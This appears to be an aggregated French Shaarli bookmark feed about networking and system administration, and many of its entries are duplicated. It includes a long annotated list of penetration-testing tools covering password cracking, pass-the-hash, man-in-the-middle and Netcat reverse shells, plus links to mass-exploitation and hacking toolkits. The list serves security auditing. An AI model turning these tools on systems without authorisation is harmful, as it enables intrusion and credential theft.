  • Utiliser Firefox Klar ou au moins en navigation privée.
  • Créer un compte email chez mail.com ; c'est le seul service un tant soit peu répandu, qui n'est pas sur liste noire chez FB et qui ne nécessite ni d'avoir au préalable une adresse email et encore moins de renseigner un numéro de téléphone.
  • Créer son compte FB à l'aide d'une adresse email : « S'inscrire avec une adresse e-mail ».

Enjoy ! (par exemple, au hasard, avec RSS-Bridge
Permalien

Tibiaster djanybekensis Speedtest d’Ookla – le test de vitesse de connexion global

Permalink
Oros links Détecter les serveurs DHCP indésirables (Rogue DHCP Servers) - Sebastien PALMA
via http://abel.antunes.free.fr/shaarli/index.php5?jg3RFQ
Permalink
Tibiaster djanybekensis Transports: Coop, Migros et 5 autres sociétés suisses vont créer un réseau de distribution d'hydrogène

Permalink
Oros links Linux: Setup a transparent proxy with Squid in three easy steps - nixCraft

Permalink
Oros links Note: Mirrors LinuxMint / Ubuntu / Debian
https://www.linuxmint.com/mirrors.php
https://wiki.ubuntu.com/Mirrors
  https://wiki.ubuntu.com/Mirrors/Scripts
https://www.debian.org/mirror/ftpmirror
Permalink
Oros links Note: Mirrors LinuxMint / Ubuntu / Debian
https://www.linuxmint.com/mirrors.php
https://wiki.ubuntu.com/Mirrors
  https://wiki.ubuntu.com/Mirrors/Scripts
  https://help.ubuntu.com/community/Debmirror
https://www.debian.org/mirror/ftpmirror
Permalink
Oros links Insomnia REST Client
Pour envoyer des requêtes GET, POST, ...
Permalink
Liens du Parigot-Manchot Comment Vero est devenue appli non grata en 24h

Petite piqûre sur Vero, le réseau social qui... non oubliez le pourquoi et lisez juste : Vero paye des "zinfluenceurs" qui amènent leurs moutons puis conchie le réseau quand il devient la cible du bad buzz.
— <a href="https://gilles.wittezaele.fr/liens/?zcmWMw" title="Permalien">Permalien</a>

Liens du Parigot-Manchot Comment Vero est devenue appli non grata en 24h

Petite piqûre sur Vero, le réseau social qui... non oubliez le pourquoi et lisez juste : Vero paye des "zinfluenceurs" qui amènent leurs moutons puis conchie le réseau quand il devient la cible du bad buzz.
— <a href="https://www.parigotmanchot.fr/liens/?I8ftUQ" title="Permalien">Permalien</a>

Liens du Parigot-Manchot Comment Vero est devenue appli non grata en 24h

Petite piqûre sur Vero, le réseau social qui... non oubliez le pourquoi et lisez juste : Vero paye des "zinfluenceurs" qui amènent leurs moutons puis conchie le réseau quand il devient la cible du bad buzz.
Permalien

Les bons liens du Gégé Régler les problèmes de MTU et de MSS
Les Liens de Memiks Comment faire une terminaison avec un connecteur RJ45 ?
Tibiaster djanybekensis FOAF — Wikipédia

Permalink
Liens Ecyseo Pour l’abolition du Like | ploum.net

J'irai plus loin : abolissons Facebook et consort.

Sinon, par rapport à la fin de l'article, il faudrait signaler à Ploum qu'il y a Shaarli et les rivers qui existent depuis pas mal de temps maintenant...
Permalink

Tibiaster djanybekensis Partagerie - Partageons nos surplus

Permalink
Oros links GitHub - NullArray/AutoSploit: Automated Mass Exploiter

Permalink
Oros links WireGuard: fast, modern, secure VPN tunnel
via http://sebsauvage.net/links/?WNG9Ug
Permalink
Oros links OpenSnitch
«OpenSnitch is a GNU/Linux port of the Little Snitch application firewall.»
https://github.com/evilsocket/opensnitch

via https://famille-michon.fr/links/?X9AQYQ
Permalink
Oros links Note: Outils autit sécurité
Outils Linux basiques (ping, telnet, dig, netstat, whois, nslookup…)
    Outils réseau et systèmes de base apportant différentes fonctionnalités et permettant de réaliser des tests de reconnaissances manuels

Hping
    Hping est un outil réseau qui permet de générer des paquets et ainsi d'obtenir des informations détaillées sur la topologie d'un réseau.

Nmap
    Outil open source d'exploration réseau et d'audit de sécurité notamment à l’aide d’une bibliothèque de script NSE .
    https://www.nmap.org/

Whireshark
    Outil d’analyse de protocoles pour Unix et Windows - http://www.wireshark.org

Tcpdump
    Outil d’analyse de protocoles pour Unix et Windows - http://www.tcpdump.org

Dsniff
    Dsniff est une collection d’outils pour l’audit réseau et le test d’intrusion - http://monkey.org/~dugsong/dsniff/

Ettercap
    Outil d’interception de flux réseau dit d’attaque de l’homme du milieu MITM - http://ettercap.sourceforge.net/

John The Ripper
    John the Ripper permet de casser de nombreux hashes dans le but de récupérer les mots de passe associés http://www.openwall.com/john/

THC-Hydra
    Outil de brute force réseaux supportant de nombreux services - http://www.thc.org/thc-hydra/

Ophcrack
    Outil de cassage de mot de passe Windows (HASH LM et NT) à l’aide de rainbow tables http://ophcrack.sourceforge.net/

Ernst & Young Mercury scripts
    Scripts internes développés par les équipes d’EY. Ces scripts permettent notamment : d'automatiser certaines tâches d’audit de configuration

Burp suite
    Burp Suite est un ensemble d'outils utilisés afin de tester la sécurité des sites internet et d'application WEB - portswigger.net/burp

Nessus
    Outils d’analyse automatisée permettant notamment d’analyser la configuration d’un actif informationnel
    www.teenable.com

Webscarab
    WebScarab est un outil issu de l’OWASP, proxy applicatif permettant d’effectuer des tests d’intrusion sur des infrastructures Web

Cain & Abel
    Outil de récupération et de cassage de mot de passe pour systèmes d'exploitation Microsoft. http://www.oxid.it/cain.html

MBSA (Microsoft Baseline Security Analyzer)
    Détermine et optimise l’état de sécurité selon les recommandations de Microsoft - http://technet.microsoft.com/fr-fr/security/cc184923),

Pass The Hash toolkit
    Outil permettant de s’authentifier auprès de serveur Windows uniquement avec le hash du mot de passe :
    https://github.com/byt3bl33d3r/pth-toolkit

OAT (Oracle Auditing Tool)
    Outil d’audit pour les SGBD oracle :
    http://www.cqure.net/wp/tools/database/test/

Metasploit
    Framework en ruby permettant la détection et l’exploitation de vulnérabilités:
    www.rapid7.com

SQLMap
    Outil permet l’automatisation d’attaque de type SQL injection

DirBuster
    Outil issu de l’OWASP de brute force de répertoire permettant la découverte de ressource sur une application Web

SSL Digger
    SSLDigger est un outil permettant d'évaluer la sécurité du chiffrement SSL d'un serveur WEB.

Walksam
    Outil permettant la récupération de la base SAM (Windows) à travers le réseau sur les ports 139 / 445
    http://razor.bindview.com/tools

Winfo
    Permet de détecter les null session sous Windows et ainsi de récupérer des comptes du domaine valide

SQLPing
    Outil d’analyse de base de données Microsft SQL
    http://www.sqlsecurity.com/downloads

IKE probe / IKE scan
    Outil permettant de tester la sécurité du protocole IKE dans le cadre de tunnel VPN.

Suite Aircrack
    La suite aircrack-ng comprend plusieurs programmes permettant d'éprouver la sécurité d'un réseau WIFI.

Kissmet
    Kissmet est un outil permettant d'éprouver la sécurité d'un réseau WIFI.

Netstumbler
    Netstumbler est un outil qui permet d'identifier et qualifier les réseaux Wifi environnants.

Netscan
    Netscan est un outil qui permet de récupérer des informations sur les réseaux (partages de fichiers, liste de machines …)

Dnsenum
    DNSenum est un outil qui permet de récupérer des informations DNS sur un domaine / adresse IP donné (Adresses MX, sous domaines …)

Reflector
    Reflector est un programme gratuit permettant de décompiler des exécutables ou dll codés en langage .net

JDGUI
    JDGUI est un programme gratuit permettant de décompiler les exécutables codés en langages Java

Nikto
    Outil automatique de scan d’application Web

Bizploit
    Suite d’outil permettant de tester la sécurité des ERP SAP

Sipvicious
    Suite d’outil permettant de tester la configuration d’une infrastructure TOIP SIP

VOIPHopper
    Outils permettant de changer de VLAN

The Harverster
    Outils permettant de faire de la récolte d’information sur internet

Maltego (community edition)
    Outil permettant la récolte d’information et les graphes liant les différentes resssources d’une entreprise

Android SDK
    Outil utilisé lors des tests d’intrusion sur les applications Mobile Android notamment via l’utilisation de l’émulateur intégré

Responder
    Outil permettant d’effectuer du man in the middle sur les réseaux Windows via les protocoles LLMNR et NBT

Netcat
    Couteau suisse réseau permettant d’ouvrir des connexions et notamment d’initier des revershell

Permalink
Oros links Note: Outils autit sécurité
Outils Linux basiques (ping, telnet, dig, netstat, whois, nslookup…)
    Outils réseau et systèmes de base apportant différentes fonctionnalités et permettant de réaliser des tests de reconnaissances manuels

Hping
    Hping est un outil réseau qui permet de générer des paquets et ainsi d'obtenir des informations détaillées sur la topologie d'un réseau.

Nmap
    Outil open source d'exploration réseau et d'audit de sécurité notamment à l’aide d’une bibliothèque de script NSE .
    https://www.nmap.org/

Whireshark
    Outil d’analyse de protocoles pour Unix et Windows - http://www.wireshark.org

Tcpdump
    Outil d’analyse de protocoles pour Unix et Windows - http://www.tcpdump.org

Dsniff
    Dsniff est une collection d’outils pour l’audit réseau et le test d’intrusion - http://monkey.org/~dugsong/dsniff/

Ettercap
    Outil d’interception de flux réseau dit d’attaque de l’homme du milieu MITM - http://ettercap.sourceforge.net/

John The Ripper
    John the Ripper permet de casser de nombreux hashes dans le but de récupérer les mots de passe associés http://www.openwall.com/john/

THC-Hydra
    Outil de brute force réseaux supportant de nombreux services - http://www.thc.org/thc-hydra/

Ophcrack
    Outil de cassage de mot de passe Windows (HASH LM et NT) à l’aide de rainbow tables http://ophcrack.sourceforge.net/

Ernst & Young Mercury scripts
    Scripts internes développés par les équipes d’EY. Ces scripts permettent notamment : d'automatiser certaines tâches d’audit de configuration

Burp suite
    Burp Suite est un ensemble d'outils utilisés afin de tester la sécurité des sites internet et d'application WEB - portswigger.net/burp

Nessus
    Outils d’analyse automatisée permettant notamment d’analyser la configuration d’un actif informationnel
    www.teenable.com

Webscarab
    WebScarab est un outil issu de l’OWASP, proxy applicatif permettant d’effectuer des tests d’intrusion sur des infrastructures Web

Cain & Abel
    Outil de récupération et de cassage de mot de passe pour systèmes d'exploitation Microsoft. http://www.oxid.it/cain.html

MBSA (Microsoft Baseline Security Analyzer)
    Détermine et optimise l’état de sécurité selon les recommandations de Microsoft - http://technet.microsoft.com/fr-fr/security/cc184923),

Pass The Hash toolkit
    Outil permettant de s’authentifier auprès de serveur Windows uniquement avec le hash du mot de passe :
    https://github.com/byt3bl33d3r/pth-toolkit

OAT (Oracle Auditing Tool)
    Outil d’audit pour les SGBD oracle :
    http://www.cqure.net/wp/tools/database/test/

Metasploit
    Framework en ruby permettant la détection et l’exploitation de vulnérabilités:
    www.rapid7.com

SQLMap
    Outil permet l’automatisation d’attaque de type SQL injection

DirBuster
    Outil issu de l’OWASP de brute force de répertoire permettant la découverte de ressource sur une application Web

SSL Digger
    SSLDigger est un outil permettant d'évaluer la sécurité du chiffrement SSL d'un serveur WEB.

Walksam
    Outil permettant la récupération de la base SAM (Windows) à travers le réseau sur les ports 139 / 445
    http://razor.bindview.com/tools

Winfo
    Permet de détecter les null session sous Windows et ainsi de récupérer des comptes du domaine valide

SQLPing
    Outil d’analyse de base de données Microsft SQL
    http://www.sqlsecurity.com/downloads

IKE probe / IKE scan
    Outil permettant de tester la sécurité du protocole IKE dans le cadre de tunnel VPN.

Suite Aircrack
    La suite aircrack-ng comprend plusieurs programmes permettant d'éprouver la sécurité d'un réseau WIFI.

Kissmet
    Kissmet est un outil permettant d'éprouver la sécurité d'un réseau WIFI.

Netstumbler
    Netstumbler est un outil qui permet d'identifier et qualifier les réseaux Wifi environnants.

Netscan
    Netscan est un outil qui permet de récupérer des informations sur les réseaux (partages de fichiers, liste de machines …)

Dnsenum
    DNSenum est un outil qui permet de récupérer des informations DNS sur un domaine / adresse IP donné (Adresses MX, sous domaines …)

Reflector
    Reflector est un programme gratuit permettant de décompiler des exécutables ou dll codés en langage .net

JDGUI
    JDGUI est un programme gratuit permettant de décompiler les exécutables codés en langages Java

Nikto
    Outil automatique de scan d’application Web

Bizploit
    Suite d’outil permettant de tester la sécurité des ERP SAP

Sipvicious
    Suite d’outil permettant de tester la configuration d’une infrastructure TOIP SIP

VOIPHopper
    Outils permettant de changer de VLAN

The Harverster
    Outils permettant de faire de la récolte d’information sur internet

Maltego (community edition)
    Outil permettant la récolte d’information et les graphes liant les différentes resssources d’une entreprise

Android SDK
    Outil utilisé lors des tests d’intrusion sur les applications Mobile Android notamment via l’utilisation de l’émulateur intégré

Responder
    Outil permettant d’effectuer du man in the middle sur les réseaux Windows via les protocoles LLMNR et NBT

Netcat
    Couteau suisse réseau permettant d’ouvrir des connexions et notamment d’initier des revershell

Permalink
Shaarli ¦ Orangina Rouge L'internet rapide et permanent[L'internet rapide et permanent]

Sympa, pleins d'informations vulgarisées sur les réseau.
Permalink

Liens Windows 10 bride votre connexion internet, voici comment l'en empêcher
"""
Windows 10 semble brider la bande passante TCP de votre connexion internet depuis la dernière mise à jour anniversaire. Le fautif serait en réalité à chercher du côté d’une fonctionnalité dite d’Auto-Tuning, censée améliorer les performances des applications qui reçoivent des données sur le socket TCP. Mais heureusement, il est possible de désactiver cette limitation.
"""

En administrateur, lancer la commande suivante :
netsh interface tcp show global

Vérifier la ligne "Receive Window Auto-Tuning Level : normal" (en français : Réglage auto fenêtre de réception)

Si ce n'est pas désactivé, il faut le désactiver :
netsh int tcp set global autotuninglevel=disabled
(Permalink)
partage de liens - nonymous Windows 10 bride votre connexion internet, voici comment l'en empêcher
Je n'avais pas constaté de ralentissement, mais à voir...
(Permalink)
Oros links PeeringDB
via https://arnaudb.net/links/?2BlbWQ
Permalink
Liens du Parigot-Manchot Le Miiverse de Nintendo ferme ses portes : la fin d’un réseau social unique en son genre
Le réseau social de Nintendo vient de fermer.

Je n'ai jamais compris l'intérêt de partager en relation avec les jeux vidéo, encore plus au sein d'un réseau très contrôlé.
Permalink
Liens du Parigot-Manchot Le Miiverse de Nintendo ferme ses portes : la fin d’un réseau social unique en son genre
Le réseau social de Nintendo vient de fermer.

Je n'ai jamais compris l'intérêt de partager en relation avec les jeux vidéo, encore plus au sein d'un réseau très contrôlé.
Permalien
Liens du Parigot-Manchot Le Miiverse de Nintendo ferme ses portes : la fin d’un réseau social unique en son genre

Le réseau social de Nintendo vient de fermer.

Je n'ai jamais compris l'intérêt de partager en relation avec les jeux vidéo, encore plus au sein d'un réseau très contrôlé.
— <a href="https://gilles.wittezaele.fr/liens/?qMauGA" title="Permalien">Permalien</a>

Oros links yWorks - The Diagramming Company

Permalink
Oros links GitHub - m4ll0k/Awesome-Hacking-Tools: Awesome Hacking Tools
Très grosse liste d'outils
Permalink
Oros links J'Alerte l'Arcep
«Votre connexion Internet fonctionne mal ? Alertez directement le régulateur des télécoms»
via http://www.numerama.com/politique/298127-un-probleme-avec-votre-connexion-internet-signalez-le-au-regulateur-des-telecoms.html
Permalink
Oros links [pfSense] Configurer un cluster de 2 pfSense redondants (failover) - Provya - Tutoriaux Asterisk et pfSense
via https://shaar.libox.fr/?1lrS6w
Permalink
/Yome/links Faille WPA2
Une faille WPA2 assez grosse permettant d'accéder à n'importe quel réseau wifi sécurisé en WPA2...
En attendant les patchs, serrez-les fesses.
(Permalink)
Tibiaster djanybekensis Ripple (protocole de paiement) — Wikipédia

Permalink
Tibiaster djanybekensis Hawala — Wikipédia

Permalink
Oros links Tester la performance de votre réseau avec Iperf
via http://liens.bytesadmin.net/?0pLzFA
Permalink
Les bons liens du Gégé Wiki Evolix - Base de connaissances pour infogérance Debian et OpenBSD

Connaissances et conventions relatives à l’administration système et réseau sous les systèmes d'exploitation Debian GNU/Linux et OpenBSD publiées par la société marseillaise Evolix.
Permalink

kalvn's links DNS66 | F-Droid - Free and Open Source Android App Repository

Un outil pour filtrer le trafic DNS sur Android.
Permalink

Oros links GitHub - portantier/habu: Python Network Hacking Toolkit
via https://github.com/portantier/habu
Permalink
kalvn's links Mon Réseau Mobile | Arcep

Un outil de comparaison de couverture réseau des opérateurs mobiles.
Permalink

Tibiaster djanybekensis Des pirates informatiques ont accédé à des réseaux électriques en Suisse - rts.ch - Sciences-Tech.

Permalink
Tibiaster djanybekensis Allain christophe - Croyances occidentales - YouTube

Permalink
Tibiaster djanybekensis Byteball — smart payments made simple

Permalink
Tibiaster djanybekensis IOTA Support - Une introduction à IOTA

Permalink
Tibiaster djanybekensis IOTA - Next Generation Blockchain

Permalink
Oros links Faire des schéma d'architecture réseau sous GNU/Linux
via https://fabienm.eu/shaarli/?dC5RsA
Permalink
Liens Ecyseo Créer un serveur d'impression (compatible AirPrint) avec une Rapsberry Pi | SUPINFO, École Supérieure d'Informatique

Cool
Permalink

Oros links Build a Raspberry Pi Scanner that Tracks the Devices Connected to Your Local Network | Make:
via https://links.neros.fr/?Oyb_hQ
Permalink
Les bons liens du Gégé Présentation de l'IDS/IPS Suricata
Les bons liens du Gégé Présentation de l'IDS/IPS Suricata

— <a href="https://bookmarks.geekandfree.org/?jrs7_A" title="Permalink">Permalink</a>

Oros links Veniam – The Internet of Moving Things
Mouai, alors si le wifi est relier à l'ordinateur de bord des véhicules,
ça peu vite poser problème niveau sécurité.
En plus avec ce genre de système, ça facilitera encore plus le tracking
des véhicules. Pas top niveau vie privé.
Et rajouter du wifi partout, je suis pas fan.
Permalink
Les bons liens du Gégé Building an IPsec gateway with OpenBSD
Les bons liens du Gégé Building an IPsec gateway with OpenBSD

— <a href="https://bookmarks.geekandfree.org/?FpcKfQ" title="Permalink">Permalink</a>

Shaarli ¦ Orangina Rouge simplewall

Cette application est juste génial :

Description
Simple tool to configure Windows Filtering Platform (WFP) which can configure network activity on your computer.
Features
Simple interface without annoying pop ups
Dropped packets logging (Windows 7 and above)
Internal blocking lists (malware, telemetry)
Free and open source
Localization support
IPv4/IPv6 support

Avec mes mots : cela permet de bloquer l'accès internet au choix à une, plusieurs ou toutes les applications du système. Avec un système de liste blanche (« tout sauf… ») ou de liste noir (« rien sauf…). C'est exactement dans la même veine que l'application Android NoRoot Firewall que j'avais découvert à l'ami SebSauvage sur son wiki.

(Est-ce utile de préciser que c'est open source ?!)


Maintenant, après 1h passé à chercher le St-Graal, je vais pouvoir commencer à bosser plutôt que contre-carrer Windows qui me télécharge des mises à jours via mon réseau 3G du téléphone afin d'installer Candy Crush…
Permalink

Les bons liens du Gégé Comment résoudre une mauvaise qualité de communication VoIP ? - Blog des télécoms
Les bons liens du Gégé Comment résoudre une mauvaise qualité de communication VoIP ? - Blog des télécoms

— <a href="https://bookmarks.geekandfree.org/?7eUJ0w" title="Permalink">Permalink</a>

Les bons liens du Gégé IPerf: des exemples...
Les bons liens du Gégé IPerf: des exemples...

— <a href="https://bookmarks.geekandfree.org/?BbUQeA" title="Permalink">Permalink</a>

Les bons liens du Gégé Calculer la gigue réseau avec des outils libres
Les bons liens du Gégé Calculer la gigue réseau avec des outils libres

— <a href="https://bookmarks.geekandfree.org/?r7zCuA" title="Permalink">Permalink</a>

Les bons liens du Gégé P-FB Site pédagogique P-FB

cours systèmes et réseaux, sécurité, python, radio...
Permalink

Les bons liens du Gégé P-FB Site pédagogique P-FB

cours systèmes et réseaux, sécurité, python, radio...
— <a href="https://bookmarks.geekandfree.org/?0GWY7Q" title="Permalink">Permalink</a>

Les bons liens du Gégé Bande passante et temps de latence réseau

Voici un article que devrait avoir lu toute personne travaillant avec un réseau (Internet par exemple) à l’international. C’est pourquoi je vous encourage à envoyer un lien vers cet article au maximum de personne possible, surtout vers votre informaticien
Permalink

Les bons liens du Gégé Bande passante et temps de latence réseau

Voici un article que devrait avoir lu toute personne travaillant avec un réseau (Internet par exemple) à l’international. C’est pourquoi je vous encourage à envoyer un lien vers cet article au maximum de personne possible, surtout vers votre informaticien
— <a href="https://bookmarks.geekandfree.org/?jv2Vig" title="Permalink">Permalink</a>

partage de liens - nonymous Linksys Velop : Test complet - Répéteurs Wi-Fi - Les Numériques
La solution pour mes problèmes de wifi merdique dans la maison ?
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens en vrac de SimonLefort Connecter son Raspberry Pi à son ordinateur sans internet – Le blog de Rames
(Réponse à http://lien.shazen.fr/?XPF4Bg )

Il est aussi possible de se connecter en SSH en connectant un câble réseau entre son ordinateur et son Raspberry Pi. (Oui, directement, sans passer par un routeur ou autre!)

Il faudra définir les adresses IP de son ordinateur et du Raspberry Pi dans la même "plage". (192.168.1.1 et 192.168.1.2 , par exemple).
(Permalink)
Liens sajous.net Note: config réseau sur Debian Stretch
Commandes pour connaitre les adresses IP (simple / précise) (eth0 devient enp4s0)
$ ip a
$ ip -c -6 address show enp4s0
Les adresses commençant par 192.168. et fe80: sont des adresses de réseau local uniquement
Commandes pour connaitre l'adresse de la passerelle (ipv4 / ipv6 / voisins)
$ ip route
$ ip -6 route
$ ip neigh
Configuration statique de l'interface réseau pour un serveur (ipv4 / ipv6)
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet static
   address 192.168.0.2/24
   gateway 192.168.0.1
  iface enp4s0 inet6 static
   address ............/64
   gateway fe80::.......
Pour un ordinateur client on préfère utiliser le DHCP
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet dhcp
  iface enp4s0 inet6 auto
Pour appliquer les changements il faut relancer l'interface réseau (ou rebooter si on est à distance)
# ip link set enp4s0 down
# ip link set enp4s0 up
# reboot
Enfin pour tester la configuration depuis un autre ordinateur
$ ping -c 3 192.168.0.2
$ ping6 -c 3 2a01:...........
Permalink
Liens sajous.net Note: config réseau sur Debian Stretch
Commandes pour connaitre les adresses IP (simple / précise) (eth0 devient enp4s0)
$ ip a
$ ip -c -6 address show enp4s0
Les adresses commençant par 192.168. et fe80: sont des adresses de réseau local uniquement
Commandes pour connaitre l'adresse de la passerelle (ipv4 / ipv6 / voisins)
$ ip route
$ ip -6 route
$ ip neigh
Configuration statique de l'interface réseau pour un serveur (ipv4 / ipv6)
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet static
   address 192.168.0.2/24
   gateway 192.168.0.1
  iface enp4s0 inet6 static
   address ............/64
   gateway fe80::.......
Pour un ordinateur client on préfère utiliser le DHCP
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet dhcp
  iface enp4s0 inet6 auto
Pour appliquer les changements il faut relancer l'interface réseau (ou rebooter si on est à distance)
# ip link set enp4s0 down
# ip link set enp4s0 up
# reboot
Enfin pour tester la configuration depuis un autre ordinateur
$ ping -c 3 192.168.0.2
$ ping6 -c 3 2a01:...........
Permalien
Liens sajous.net Note: config réseau sur Debian Stretch

Commandes pour connaitre les adresses IP (simple / précise) (eth0 devient enp4s0)
$ ip a
$ ip -c -6 address show enp4s0
Les adresses commençant par 192.168. et fe80: sont des adresses de réseau local uniquement
Commandes pour connaitre l'adresse de la passerelle (ipv4 / ipv6 / voisins)
$ ip route
$ ip -6 route
$ ip neigh
Configuration statique de l'interface réseau pour un serveur (ipv4 / ipv6)

nano /etc/network/interfaces

allow-hotplug enp4s0
iface enp4s0 inet static
address 192.168.0.2/24
gateway 192.168.0.1
iface enp4s0 inet6 static
address ............/64
gateway fe80::.......
Pour un ordinateur client on préfère utiliser le DHCP

nano /etc/network/interfaces

allow-hotplug enp4s0
iface enp4s0 inet dhcp
iface enp4s0 inet6 auto
Pour appliquer les changements il faut relancer l'interface réseau (ou rebooter si on est à distance)

ip link set enp4s0 down

ip link set enp4s0 up

reboot

Enfin pour tester la configuration depuis un autre ordinateur
$ ping -c 3 192.168.0.2
$ ping6 -c 3 2a01:...........
Permalien

Liens sajous.net Note: config réseau sur Debian Stretch
Commandes pour connaitre les adresses IP (simple / précise) (eth0 devient enp4s0)
$ ip a
$ ip -c -6 address show enp4s0
Les adresses commençant par 192.168. et fe80: sont des adresses de réseau local uniquement
Commandes pour connaitre l'adresse de la passerelle (ipv4 / ipv6 / voisins)
$ ip route
$ ip -6 route
$ ip neigh
Configuration statique de l'interface réseau pour un serveur (ipv4 / ipv6)
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet static
   address 192.168.0.2/24
   gateway 192.168.0.1
  iface enp4s0 inet6 static
   address ............/64
   gateway fe80::.......
Pour un ordinateur client on préfère utiliser le DHCP
# nano /etc/network/interfaces
  allow-hotplug enp4s0
  iface enp4s0 inet dhcp
  iface enp4s0 inet6 auto
Pour appliquer les changements il faut relancer l'interface réseau (ou rebooter si on est à distance)
# ip link set enp4s0 down
# ip link set enp4s0 up
# reboot
Enfin pour tester la configuration depuis un autre ordinateur
$ ping -c 3 192.168.0.2
$ ping6 -c 3 2a01:...........
Permalien
Liens partagés ! Communecter, la boite à outils citoyenne connectée

Communecter : Connecter à sa commune, inter connecter les communs, un réseau sociétal pour un citoyen connecté et acteur au centre de sa société.
— <a href="https://my.framasoft.org/u/emmanuel_porte/?E9P7fA" title="Permalink">Permalink</a>

~ sweet ~ Mastodon instances

Mastodon, un réseau de partage décentralisé dont voici les instances existantes.
Les adresses @free.fr ne passent pas l'étape de confirmation mais sinon l'inscription est rapide.

Ravi de voir qu'il accepte les avatars dégeulasses :P
https://octodon.social/@bigduke
Permalink

Les bons liens du Gégé Les conséquences techniques de l'interception HTTPS en entreprise
Les bons liens du Gégé Les conséquences techniques de l'interception HTTPS en entreprise

— <a href="https://bookmarks.geekandfree.org/?-OwUdw" title="Permalink">Permalink</a>

Les bons liens du Gégé Recommandations de sécurité concernant l’analyse des flux HTTPS | Agence nationale de la sécurité des systèmes d'information

Cette note présente les recommandations d’ordre technique à suivre lorsque l’analyse des flux HTTPS échangés entre un système d’information maîtrisé et des réseaux externes est indispensable.
Permalink

Les bons liens du Gégé Recommandations de sécurité concernant l’analyse des flux HTTPS | Agence nationale de la sécurité des systèmes d'information

Cette note présente les recommandations d’ordre technique à suivre lorsque l’analyse des flux HTTPS échangés entre un système d’information maîtrisé et des réseaux externes est indispensable.
— <a href="https://bookmarks.geekandfree.org/?kvePAg" title="Permalink">Permalink</a>

Un catalogue hétéroclite IP Address Tools, Network Tools, DNS Tools | IPVoid
Boîte à outil pour analyse et contrôle d'adresses IPv4.

Whois, ping, géolocalisation, MX, whois, reverse, et j'en passe. Tout regroupé sur la même page.
Permalink
Un catalogue hétéroclite IP Address Tools, Network Tools, DNS Tools | IPVoid

Boîte à outil pour analyse et contrôle d'adresses IPv4.

Whois, ping, géolocalisation, MX, whois, reverse, et j'en passe. Tout regroupé sur la même page.
— <a href="https://e-loquens.fr/?5tI-tw" title="Permalink">Permalink</a>

Un catalogue hétéroclite IP Address Tools, Network Tools, DNS Tools | IPVoid
Boîte à outil pour analyse et contrôle d'adresses IPv4.

Whois, ping, géolocalisation, MX, whois, reverse, et j'en passe. Tout regroupé sur la même page.
Permalink
Un catalogue hétéroclite IP Address Tools, Network Tools, DNS Tools | IPVoid

Boîte à outil pour analyse et contrôle d'adresses IPv4.

Whois, ping, géolocalisation, MX, whois, reverse, et j'en passe. Tout regroupé sur la même page.
— <a href="https://e-loquens.fr/?5tI-tw" title="Permalink">Permalink</a>

Shaarli Geekz0ne • KickThemOut ~ Project

Cool, à tester au boulot ^^
Roooh ça va je déconne !
Permalink

Un catalogue hétéroclite Replacing ifconfig with ip | Linux.com | The source for Linux information
Petit aide mémoire des usages de la commande ip pour remplacer le vénérable (et retraité) ifconfig).
Permalink
Un catalogue hétéroclite Replacing ifconfig with ip | Linux.com | The source for Linux information

Petit aide mémoire des usages de la commande ip pour remplacer le vénérable (et retraité) ifconfig).
— <a href="https://e-loquens.fr/?2J1h0w" title="Permalink">Permalink</a>

Un catalogue hétéroclite Replacing ifconfig with ip | Linux.com | The source for Linux information
Petit aide mémoire des usages de la commande ip pour remplacer le vénérable (et retraité) ifconfig).
Permalink
Un catalogue hétéroclite Replacing ifconfig with ip | Linux.com | The source for Linux information

Petit aide mémoire des usages de la commande ip pour remplacer le vénérable (et retraité) ifconfig).
— <a href="https://e-loquens.fr/?2J1h0w" title="Permalink">Permalink</a>

Les bons liens du Gégé A tcpdump Tutorial and Primer with Examples
Les bons liens du Gégé A tcpdump Tutorial and Primer with Examples

— <a href="https://bookmarks.geekandfree.org/?BHRZBQ" title="Permalink">Permalink</a>

Les bons liens du Gégé Spanning Tree – Théorie | Networklab
Les bons liens du Gégé Spanning Tree – Théorie | Networklab

— <a href="https://bookmarks.geekandfree.org/?a47jUg" title="Permalink">Permalink</a>

